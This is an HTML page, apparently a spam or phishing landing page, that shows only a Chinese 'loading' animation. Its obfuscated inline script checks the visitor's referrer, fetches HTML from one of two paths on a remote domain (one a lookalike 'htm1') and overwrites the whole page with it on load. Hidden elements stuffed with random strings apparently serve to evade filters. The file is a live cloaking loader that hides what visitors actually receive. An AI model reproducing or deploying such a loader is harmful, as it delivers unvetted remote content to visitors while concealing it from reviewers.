<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .WhJDtG47d {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .WhJDtG47d .GcrOH8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .WhJDtG47d .content {
            line-height: 50px;
            text-align: center
        }

        .WhJDtG47d .img {
            width: 100%
        }

        .WhJDtG47d .OfrxXQC {
            text-align: center
        }

        .WhJDtG47d .OfrxXQC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .WhJDtG47d .OfrxXQC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .WhJDtG47d .OfrxXQC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .WhJDtG47d .OfrxXQC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .WhJDtG47d .OfrxXQC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .WhJDtG47d .OfrxXQC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .WhJDtG47d .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function A2BwLAI8KhCUg(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iclvk = A2BwLAI8KhCUg('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iclvk +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iclvk +".html?a=share";
		}
		
        BdQQjt=url+"#"+new Date().getTime();
        BdQQjt && function() {
            $.get(BdQQjt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >RAaW4hwnIbOVEBUvwY7QWQw8wRHYc1a4ZU</h1>
<li style='display:none' >XvxVEE04UkvAy7QYdLQDVb1vOsEWuKXivrJ2JZL6gkmb1Bbkp8WJGWoIW</li>
<ul style='display:none' >Wqsu1wgPP1foJQXjgJjFnysq7rHCgmcfgp2</ul><div class="WhJDtG47d">
    <div class="GcrOH8">
        <div class="OfrxXQC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >yEb4Ww8G8GSO5mF88Cr0SYDf7HSVYGpiX8hYd</b>
<ul style='display:none' >zNdajdA5xfUqckqr4Jfkj2UkKQ5TPfafhkqek2cXBvnIpeP3pqqnP9196iD8Yo2LjxGUUKsHhzswzCHbiDJ0R67mjBN3Ee3vLNWk</ul>
<a  href='#' style='display:none'>TvRkqqMcnBddpIljfhBziNbmR7Gz6b4T1RcdfmRt7t3s2iJQ2</a>
<li style='display:none' >JuzlYd1SCgBwLhHjKuPOz2vAR7IlURTogh6ihLSTfW2c7gjsFtonZCjGmsJMSE1Cpf0cgcz44lkyCgnLp9yPFWD1YTbb0e</li></body>
</html>